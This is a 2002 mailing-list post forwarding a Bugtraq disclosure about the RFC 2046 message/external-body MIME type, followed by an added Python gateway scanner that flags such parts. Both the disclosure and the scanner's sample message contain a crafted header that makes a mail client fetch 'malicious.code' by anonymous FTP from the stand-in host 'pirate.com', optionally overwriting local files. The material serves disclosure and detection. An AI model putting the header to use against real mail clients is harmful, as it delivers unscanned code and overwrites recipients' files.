[Evolution] [Fwd: Another possible RFC 2046 vulnerability.]
- From: Richard Bellavance <richard bellavance enter-net com>
- To: evolution ximian com
- Subject: [Evolution] [Fwd: Another possible RFC 2046 vulnerability.]
- Date: 27 Sep 2002 11:48:04 -0400
I hope support for this aberration will not be integrated into
Evolution...
At least, 1.0.8 does not seem to support it.
--
Richard Bellavance, COGNICASE inc.
Senior analyst-programmer, Hosting, security and networks
T.: 514-732-8000 #4153, F.: 514-732-8021
20, Place du Commerce, Verdun, Qc, H3E 1Z6, CANADA
--- Begin Message ---
- From: Jose Marcio Martins da Cruz <Jose-Marcio Martins ensmp fr>
- To: bugtraq <bugtraq securityfocus com>
- Subject: Another possible RFC 2046 vulnerability.
- Date: Fri, 27 Sep 2002 13:01:46 +0200
Hi,
Some days ago, we were talking about the RFC 2046 message fragmentation
vulnerability.
There is another related RFC 2046 vulnerability: the message/external-body
message type.
The RFC 2046 message/external-body MIME type allows sending messages not by
their content, but by reference.
In this case, you can send a message with the following MIME tag:
Content-Type: message/external-body; name="malicious.code";
site="pirate.com"; mode="image";
access-type=ANON-FTP; directory="pub"
The client MUA receives this and will get the "malicious.code" file by
anonymous FTP from the pirate.com FTP server.
RFC 2046 defines five access-types: "FTP", "ANON-FTP", "TFTP",
"LOCAL-FILE", and "MAIL-SERVER".
There are some other optional parameters to this feature. For example,
if the message includes the parameter permission="write", an existing file
will be overwritten.
RFC 2046 says something about security in paragraph 5.2.3.6:
(1) Accessing data via a "message/external-body" reference
effectively results in the message recipient performing
an operation that was specified by the message
originator. It is therefore possible for the message
originator to trick a recipient into doing something
they would not have done otherwise. ...
Combining different access-types (mainly anon-ftp, mail-server and
local-file) can create, IMHO, more complex attacks.
What's interesting is that in this case the message and the malicious
code pass through two different network paths: the message is sent by
mail and the malicious code will be fetched by the receiver by anonymous FTP.
In the case of the previous vulnerability (fragmented message), the message
and the malicious code use the same network path.
Classical mail server virus scanners will never see the malicious code
pass through them, as they will never have the entire malicious code
available.
The only way to detect it at the mail server, IMHO, is by lexical analysis
of MIME tags.
Netscape Communicator 4.79 is compatible with this RFC 2046 feature.
I can't say anything about others mail clients, as I'm sick at home and
I have no access to other MUAs.
Attached to this message you'll find a message sent using this feature
and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can
check it out with Outlook and other popular MUAs. It's in the /var/mail
format : you can append it to your mailbox and try it... 8-)
References: RFC 2046 - MIME - Media Types
Jose Marcio
--
-------------------------------------------------------------------
Jose Marcio MARTINS DA CRUZ
Ecole Nationale Superieure des Mines de Paris
Centre de Calcul
60, bd Saint Michel
75272 - PARIS CEDEX 06
Tel.: 01.40.51.93.41
http://www.ensmp.fr/~martins
mailto:martins cc ensmp fr
--- End Message ---
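The forwarded post suggests that the only place a mail server can catch this is a lexical scan of the MIME headers, since the referenced content never passes through the server. The following is an added example written for this page, not code from the post, from Jose Marcio, or from Evolution: it parses a message with the standard-library `email` package, reports every message/external-body part with its access-type, site, directory, name and permission parameters, and measures how many content bytes the part actually carries (zero, which is why a content scanner sees nothing). The sample message is constructed; "pirate.com" and "malicious.code" are the hypothetical values from the post, not real resources.

```python
"""Lexical scan of MIME headers for RFC 2046 message/external-body parts.

Added example for this page, not code from the post or from Evolution.
Uses only the standard-library `email` package.  The sample message is
constructed; "pirate.com" and "malicious.code" are the hypothetical
values from the post, not real resources.
"""
import email
from email.message import Message

# The five access-types RFC 2046 defines for message/external-body.
RFC2046_ACCESS_TYPES = {"ftp", "anon-ftp", "tftp", "local-file", "mail-server"}

# Constructed sample: the second part carries no content at all, only a
# reference the MUA is expected to resolve by anonymous FTP, with
# permission="write" so an existing local file may be overwritten.
SAMPLE_MESSAGE = (
    "From: sender@example.org\n"
    "To: victim@example.net\n"
    "Subject: external-body test (constructed sample)\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="bnd"\n'
    "\n"
    "--bnd\n"
    "Content-Type: text/plain\n"
    "\n"
    "Please see the attached file.\n"
    "\n"
    "--bnd\n"
    'Content-Type: message/external-body; name="malicious.code";\n'
    ' site="pirate.com"; mode="image"; permission="write";\n'
    ' access-type=ANON-FTP; directory="pub"\n'
    "\n"
    "Content-Type: application/octet-stream\n"
    "\n"
    "--bnd--\n"
)


def _content_type_params(part: Message) -> dict:
    """Content-Type parameters of a part, keys lower-cased, values unquoted.
    get_params() returns the media type itself as the first tuple; skip it."""
    params = part.get_params(failobj=[]) or []
    return {name.lower(): value for name, value in params[1:]}


def _inline_payload_bytes(part: Message) -> int:
    """Bytes of real content carried inside an external-body part.
    The parser treats the body of message/external-body as a nested message
    (the RFC's "phantom" headers); whatever body that nested message has is
    all a content scanner at the gateway would ever see."""
    if not part.is_multipart():
        return len(part.get_payload(decode=True) or b"")
    total = 0
    for sub in part.walk():
        if sub is part or sub.is_multipart():
            continue
        total += len(sub.get_payload(decode=True) or b"")
    return total


def scan_external_body(raw_message: str) -> list:
    """Report every message/external-body reference in a raw RFC 822 message."""
    msg = email.message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "message/external-body":
            continue
        p = _content_type_params(part)
        access_type = p.get("access-type", "").lower()
        findings.append({
            "access_type": access_type,
            "known_access_type": access_type in RFC2046_ACCESS_TYPES,
            "site": p.get("site", ""),
            "server": p.get("server", ""),  # used by the mail-server access-type
            "directory": p.get("directory", ""),
            "name": p.get("name", ""),
            "writes_local_file": p.get("permission", "").lower() == "write",
            "inline_bytes": _inline_payload_bytes(part),
        })
    return findings


def reference(finding: dict) -> str:
    """Locator for the out-of-band fetch the recipient's MUA would perform."""
    kind = finding["access_type"]
    if kind in ("ftp", "anon-ftp", "tftp"):
        path = "/".join(x for x in (finding["directory"], finding["name"]) if x)
        return f"{kind}://{finding['site']}/{path}"
    if kind == "local-file":
        return f"local-file:{finding['name']}"
    if kind == "mail-server":
        return f"mail-server:{finding['server']}"
    return f"{kind or 'unknown'}:?"


def should_quarantine(raw_message: str) -> bool:
    """Gateway policy: hold any message carrying an external-body reference,
    since the content it points at can never be scanned in transit."""
    return bool(scan_external_body(raw_message))


if __name__ == "__main__":
    for f in scan_external_body(SAMPLE_MESSAGE):
        print(f"{reference(f)}  write={f['writes_local_file']}  "
              f"inline_bytes={f['inline_bytes']}")
    print("quarantine:", should_quarantine(SAMPLE_MESSAGE))
```

The scan deliberately keys on the Content-Type header alone and never tries to resolve the reference, so it is safe to run on untrusted mail at a gateway; the `inline_bytes` field is what makes the post's point concrete, since the part that would deliver the code contains no bytes for a signature scanner to look at.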